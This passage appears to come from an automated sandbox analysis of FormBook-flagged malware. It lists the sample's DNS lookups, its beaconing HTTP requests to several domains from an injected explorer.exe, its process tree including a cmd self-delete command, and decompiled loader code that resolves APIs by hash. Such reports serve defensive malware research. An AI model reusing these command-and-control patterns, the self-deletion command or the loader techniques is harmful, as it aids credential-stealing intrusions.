Jan 13, 2021 21:21:45.530606031 CET	60599	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:45.586942911 CET	53	60599	8.8.8.8	192.168.2.7
Jan 13, 2021 21:21:45.594459057 CET	59571	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:45.642530918 CET	53	59571	8.8.8.8	192.168.2.7
Jan 13, 2021 21:21:46.257116079 CET	52689	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:46.305104017 CET	53	52689	8.8.8.8	192.168.2.7
Jan 13, 2021 21:21:47.079885960 CET	50290	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:47.127847910 CET	53	50290	8.8.8.8	192.168.2.7
Jan 13, 2021 21:21:48.229903936 CET	60427	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:48.286302090 CET	53	60427	8.8.8.8	192.168.2.7
Jan 13, 2021 21:21:49.453710079 CET	56209	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:49.513180971 CET	53	56209	8.8.8.8	192.168.2.7
Jan 13, 2021 21:21:50.752135038 CET	59582	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:50.808866978 CET	53	59582	8.8.8.8	192.168.2.7
Jan 13, 2021 21:21:52.092726946 CET	60949	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:52.156522036 CET	53	60949	8.8.8.8	192.168.2.7
Jan 13, 2021 21:22:03.717175007 CET	58542	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:22:04.732358932 CET	58542	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:22:05.748018026 CET	58542	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:22:05.943634033 CET	59179	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:22:06.000158072 CET	53	59179	8.8.8.8	192.168.2.7
Jan 13, 2021 21:22:06.539079905 CET	53	58542	8.8.8.8	192.168.2.7
Jan 13, 2021 21:22:07.928931952 CET	53	58542	8.8.8.8	192.168.2.7
Jan 13, 2021 21:22:08.307085037 CET	53	58542	8.8.8.8	192.168.2.7
Jan 13, 2021 21:22:09.525789976 CET	60927	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:22:09.576493979 CET	53	60927	8.8.8.8	192.168.2.7
Jan 13, 2021 21:22:24.710690022 CET	57854	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:22:24.787173986 CET	53	57854	8.8.8.8	192.168.2.7
Jan 13, 2021 21:22:29.421145916 CET	62026	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:22:29.469001055 CET	53	62026	8.8.8.8	192.168.2.7
Jan 13, 2021 21:22:45.240956068 CET	59453	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:22:45.303381920 CET	53	59453	8.8.8.8	192.168.2.7
Jan 13, 2021 21:23:05.487695932 CET	62468	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:23:05.564940929 CET	53	62468	8.8.8.8	192.168.2.7
Jan 13, 2021 21:23:27.971364021 CET	52563	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:23:28.041452885 CET	53	52563	8.8.8.8	192.168.2.7
Jan 13, 2021 21:23:48.376846075 CET	54721	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:23:48.443021059 CET	53	54721	8.8.8.8	192.168.2.7
Jan 13, 2021 21:24:08.842504978 CET	62826	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:24:08.907586098 CET	53	62826	8.8.8.8	192.168.2.7

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 13, 2021 21:22:07.929063082 CET	192.168.2.7	8.8.8.8	cff5	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 13, 2021 21:21:43.092905998 CET	192.168.2.7	8.8.8.8	0x9e51	Standard query (0)	www.pciappky.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:22:03.717175007 CET	192.168.2.7	8.8.8.8	0xb3a9	Standard query (0)	www.baidu4.net	A (IP address)	IN (0x0001)
Jan 13, 2021 21:22:04.732358932 CET	192.168.2.7	8.8.8.8	0xb3a9	Standard query (0)	www.baidu4.net	A (IP address)	IN (0x0001)
Jan 13, 2021 21:22:05.748018026 CET	192.168.2.7	8.8.8.8	0xb3a9	Standard query (0)	www.baidu4.net	A (IP address)	IN (0x0001)
Jan 13, 2021 21:22:24.710690022 CET	192.168.2.7	8.8.8.8	0x6c2a	Standard query (0)	www.borokish.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:22:45.240956068 CET	192.168.2.7	8.8.8.8	0x54b5	Standard query (0)	www.memorialinsg.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:23:05.487695932 CET	192.168.2.7	8.8.8.8	0x6891	Standard query (0)	www.fishbitedogtreats.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:23:27.971364021 CET	192.168.2.7	8.8.8.8	0xc9c5	Standard query (0)	www.wingateofhouston.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:23:48.376846075 CET	192.168.2.7	8.8.8.8	0xb31f	Standard query (0)	www.eternylyze.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:24:08.842504978 CET	192.168.2.7	8.8.8.8	0xb4d	Standard query (0)	www.ifeelthevoice.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 13, 2021 21:21:43.253431082 CET	8.8.8.8	192.168.2.7	0x9e51	No error (0)	www.pciappky.com		199.59.242.153	A (IP address)	IN (0x0001)
Jan 13, 2021 21:22:06.539079905 CET	8.8.8.8	192.168.2.7	0xb3a9	Server failure (2)	www.baidu4.net	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 21:22:07.928931952 CET	8.8.8.8	192.168.2.7	0xb3a9	Server failure (2)	www.baidu4.net	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 21:22:08.307085037 CET	8.8.8.8	192.168.2.7	0xb3a9	Server failure (2)	www.baidu4.net	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 21:22:24.787173986 CET	8.8.8.8	192.168.2.7	0x6c2a	No error (0)	www.borokish.com		185.78.22.74	A (IP address)	IN (0x0001)
Jan 13, 2021 21:22:45.303381920 CET	8.8.8.8	192.168.2.7	0x54b5	Name error (3)	www.memorialinsg.com	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 21:23:05.564940929 CET	8.8.8.8	192.168.2.7	0x6891	Name error (3)	www.fishbitedogtreats.com	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 21:23:28.041452885 CET	8.8.8.8	192.168.2.7	0xc9c5	No error (0)	www.wingateofhouston.com	wingateofhouston.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:23:28.041452885 CET	8.8.8.8	192.168.2.7	0xc9c5	No error (0)	wingateofhouston.com		34.102.136.180	A (IP address)	IN (0x0001)
Jan 13, 2021 21:23:48.443021059 CET	8.8.8.8	192.168.2.7	0xb31f	No error (0)	www.eternylyze.com	master-7rqtwti-vginpjx36tvho.uk-1.platformsh.site		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:23:48.443021059 CET	8.8.8.8	192.168.2.7	0xb31f	No error (0)	master-7rqtwti-vginpjx36tvho.uk-1.platformsh.site		35.242.183.249	A (IP address)	IN (0x0001)
Jan 13, 2021 21:24:08.907586098 CET	8.8.8.8	192.168.2.7	0xb4d	No error (0)	www.ifeelthevoice.com		74.208.236.11	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.pciappky.com

www.borokish.com

www.wingateofhouston.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49740	199.59.242.153	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:21:43.380984068 CET	7697	OUT	GET /nf3n/?P6A=BWH4JYaT58lXsf+hwUDxH06dhaR/NFiLUxB8VjbVPAJsYgbKUu72S4XTqnjrUaFuA8KvggDN6w==&-ZS=W6O4IjSXA HTTP/1.1 Host: www.pciappky.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:21:43.504091978 CET	7699	IN	HTTP/1.1 200 OK Server: openresty Date: Wed, 13 Jan 2021 20:21:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Upa+5FF8IgP0FoNjtcDfTjRq+ugDfYoFpjAOTEUl1bDMy07A7J2kY88sO6z5hnC/yeJa/WQcu/oKCcbpKXnFWg== Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 55 70 61 2b 35 46 46 38 49 67 50 30 46 6f 4e 6a 74 63 44 66 54 6a 52 71 2b 75 67 44 66 59 6f 46 70 6a 41 4f 54 45 55 6c 31 62 44 4d 79 30 37 41 37 4a 32 6b 59 38 38 73 4f 36 7a 35 68 6e 43 2f 79 65 4a 61 2f 57 51 63 75 2f 6f 4b 43 63 62 70 4b 58 6e 46 57 67 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65 Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Upa+5FF8IgP0FoNjtcDfTjRq+ugDfYoFpjAOTEUl1bDMy07A7J2kY88sO6z5hnC/yeJa/WQcu/oKCcbpKXnFWg=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)\|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one
Jan 13, 2021 21:21:43.504126072 CET	7700	IN	Data Raw: 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 61 7a 78 2e 73 65 61 72 63 68 21 3d 3d 27 3f 7a 27 29 7b 61 7a 78 2e 68 72 65 66 3d 27 2f 3f 7a 27 3b 7d 7d 3b 44 44 2e 6f 6e 6c 6f 61 64 3d 44 44 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 Data Ascii: rror=function(){if(azx.search!=='?z'){azx.href='/?z';}};DD.onload=DD.onreadystatechange=function(){if(!aAC&&LU){if(!window['googleNDT_']){}LU(google.ads.domains.Caf);}aAC=true;};DT.body.appendChild(DD);return{azm:function(n$){if(aAC)n$(goog
Jan 13, 2021 21:21:43.504148960 CET	7701	IN	Data Raw: 2c 52 72 3d 77 69 6e 64 6f 77 2c 61 7a 78 3d 52 72 2e 6c 6f 63 61 74 69 6f 6e 2c 61 41 42 3d 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2c 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 53 66 3d 44 54 2e 62 6f 64 79 7c 7c 44 54 2e 67 65 74 45 6c 65 6d 65 6e 74 73 Data Ascii: ,Rr=window,azx=Rr.location,aAB=top.location,DT=document,Sf=DT.body\|\|DT.getElementsByTagName('body')[0],aAy=0,aAx=0,aAz=0,$IE=null;if(Sf.className==='ie6')$IE=6;else if(Sf.className==='ie7')$IE=7;else if(Sf.className==='ie8')$IE=8;else if(Sf
Jan 13, 2021 21:21:43.504165888 CET	7702	IN	Data Raw: 67 5f 70 64 2e 72 5f 77 68 3a 27 26 77 68 3d 27 2b 61 41 78 29 2b 0a 28 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 64 21 3d 3d 65 66 3f 27 26 72 65 66 5f 6b 65 79 77 6f 72 64 3d 27 2b 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 64 3a 27 27 29 Data Ascii: g_pd.r_wh:'&wh='+aAx)+(g_pd.ref_keyword!==ef?'&ref_keyword='+g_pd.ref_keyword:'')+(g_pc.$isWhitelisted()?'&abp=1':'')+($IE!==null?'&ie='+$IE:'')+(g_pd.partner!==ef?'&partner='+g_pd.partner:'')+(
Jan 13, 2021 21:21:43.504183054 CET	7702	IN	Data Raw: 31 31 35 0d 0a 67 5f 70 64 2e 73 75 62 69 64 31 21 3d 3d 65 66 3f 27 26 73 75 62 69 64 31 3d 27 2b 67 5f 70 64 2e 73 75 62 69 64 31 3a 27 27 29 2b 0a 28 67 5f 70 64 2e 73 75 62 69 64 32 21 3d 3d 65 66 3f 27 26 73 75 62 69 64 32 3d 27 2b 67 5f 70 Data Ascii: 115g_pd.subid1!==ef?'&subid1='+g_pd.subid1:'')+(g_pd.subid2!==ef?'&subid2='+g_pd.subid2:'')+(g_pd.subid3!==ef?'&subid3='+g_pd.subid3:'')+(g_pd.subid4!==ef?'&subid4='+g_pd.subid4:'')+(g_pd.subid5!==ef?'&subid5='+g_pd.subid5:'');Sf.appendC

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49754	185.78.22.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:22:24.919759989 CET	9433	OUT	GET /nf3n/?P6A=XF3ACZVZ0AFxpmcjv7zNQUKAsvnV4JVkDOgKKla4SX4XI6rXEfoV+gBXeaHQvMH/qTdtiOwxQg==&-ZS=W6O4IjSXA HTTP/1.1 Host: www.borokish.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:22:25.049778938 CET	9434	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 13 Jan 2021 20:22:24 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.borokish.com/nf3n/?P6A=XF3ACZVZ0AFxpmcjv7zNQUKAsvnV4JVkDOgKKla4SX4XI6rXEfoV+gBXeaHQvMH/qTdtiOwxQg==&-ZS=W6O4IjSXA Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49756	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:23:28.085913897 CET	9446	OUT	GET /nf3n/?P6A=bFr0arjPDc1B3fljAhhQU4NpKn/qi+N2lxsYOk/PDiFBsnuAdXLBpwrG8B0Izk+nd97PpVoHHg==&-ZS=W6O4IjSXA HTTP/1.1 Host: www.wingateofhouston.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:23:28.224693060 CET	9447	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Jan 2021 20:23:28 GMT Content-Type: text/html Content-Length: 275 ETag: "5ffc838f-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 74852.exe PID: 4604 Parent PID: 5580

General

Start time:	21:20:40
Start date:	13/01/2021
Path:	C:\Users\user\Desktop\74852.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\74852.exe'
Imagebase:	0x230000
File size:	237056 bytes
MD5 hash:	E295CB54968CB6F3575A7CAF32FE7F5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: 74852.exe PID: 5884 Parent PID: 4604

General

Start time:	21:20:41
Start date:	13/01/2021
Path:	C:\Users\user\Desktop\74852.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\74852.exe'
Imagebase:	0x230000
File size:	237056 bytes
MD5 hash:	E295CB54968CB6F3575A7CAF32FE7F5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3292 Parent PID: 5884

General

Start time:	21:20:45
Start date:	13/01/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff662bf0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: chkdsk.exe PID: 5476 Parent PID: 3292

General

Start time:	21:21:00
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\chkdsk.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\chkdsk.exe
Imagebase:	0x1250000
File size:	23040 bytes
MD5 hash:	2D5A2497CB57C374B3AE3080FF9186FB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6200 Parent PID: 5476

General

Start time:	21:21:05
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\74852.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6296 Parent PID: 6200

General

Start time:	21:21:05
Start date:	13/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 74852.exe PID: 4604 Parent PID: 5580 74852.exeCOMMON

Executed Functions

Function 00237910, Relevance: 6.0, APIs: 4, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00237910(void* __ecx) {
				void* _v8;
				void* _t5;
				void* _t7;
				void* _t14;

				_t14 = __ecx;
				_push(__ecx);
				_t5 = RtlAllocateHeap(GetProcessHeap(), 1, 0x17d78400); // executed
				_v8 = _t5;
				_push(_t5);
				if(_t5 != 0x11) {
					asm("cld");
				}
				asm("clc");
				_pop(_t7);
				if(_v8 != 0) {
					E00237C30(_t14, _v8, 0x17d78400);
					_push(_t11);
					asm("cld");
					_t7 = HeapAlloc(GetProcessHeap(), 1, 0);
				}
				return _t7;
			}

0x00237910
0x00237913
0x00237923
0x00237929
0x0023792c
0x00237930
0x00237934
0x00237935
0x00237939
0x0023793a
0x0023793f
0x0023794d
0x00237952
0x00237957
0x00237964
0x00237964
0x0023796e

APIs

GetProcessHeap.KERNEL32(00000001,17D78400,?,?,?,00237990), ref: 0023791C
RtlAllocateHeap.NTDLL(00000000,?,?,?,00237990), ref: 00237923
GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,?,00237990), ref: 0023795D
HeapAlloc.KERNEL32(00000000,?,?,?,00237990), ref: 00237964

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocAllocate
String ID:
API String ID: 1154092256-0
Opcode ID: 566bfb3b48f275582b6cb9fbb29d83b9130ed8b82cb895f6f809dff198ad42c6
Instruction ID: 3ecead9a931b1d858f20061fad513ed61302b5e0091c9147f2efd18a3999586a
Opcode Fuzzy Hash: 566bfb3b48f275582b6cb9fbb29d83b9130ed8b82cb895f6f809dff198ad42c6
Instruction Fuzzy Hash: FFF0BEB2951218BFEB146BB4AC4EBABB39CA708718F604444F504D7250C9B28A088AB1

Uniqueness

Uniqueness Score: -1.00%

Function 00237970, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 173
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			_entry_(void* __ecx, void* __eflags, void* __fp0) {
				signed int _v5;
				signed int _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v36;
				long _v40;
				void* _v1040;
				_Unknown_base(*)() _v7704;
				void* _t161;
				void* _t162;
				void* _t163;
				void* _t168;

				_t168 = __fp0;
				_t120 = __ecx;
				E00237C90(0x1e14, __ecx);
				_v16 = GetModuleHandleW(L"Kernel32.dll");
				E00237910(_t120); // executed
				_v36 = E00237800(_v16, 0x69a1ad6);
				_v20 = E00237800(_v16, 0x9c857be);
				_v24 = E00237800(_v16, 0x93b3503e);
